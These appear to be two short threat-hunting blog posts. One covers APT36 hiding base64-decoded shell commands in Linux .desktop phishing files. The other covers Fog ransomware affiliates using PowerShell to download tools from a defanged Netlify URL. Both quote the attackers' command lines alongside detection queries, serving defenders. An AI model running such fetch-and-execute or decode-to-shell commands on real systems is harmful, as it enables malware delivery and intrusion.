Know Your Adversary

Hello everyone! I already mentioned that threat actors started to use phishing emails to attack Linux systems. No, not globally. At least, for now. So, as you know, APT36 usually use malicious .desktop files, and hides malicious logic inside encoded data, for example: sh -c "echo [base64_encoded_data] | base64 -d | sh" Yes, we can see similar commands executed legitimately, and yes, it's another hunting opportunity: event_type: "processcreatenix" AND cmdline: ("echo" AND "base64" AND "d" AND "sh") See you tomorrow!

Hello everyone! Today we'll look at another example of Ingress Tool Transfer (T1105) . And this time adversaries used Netlify to store malicious files. According to the report , Fog ransomeware affiliates used PowerShell to download malicious files, for example: iwr -uri 'hxxps://hilarious-trifle-d9182e.netlify[.]app/ktool.exe' -outfile $temppath As you can see, they used Netlify, a legitimate platform for building, deploying, and scaling web apps, to store those files. To tell the truth, it's not the first time I see adversaries use it, so it's another good target for hunting: event_type: "dnsreqwin" AND dns_rname: "netlify.app" See you tomorrow!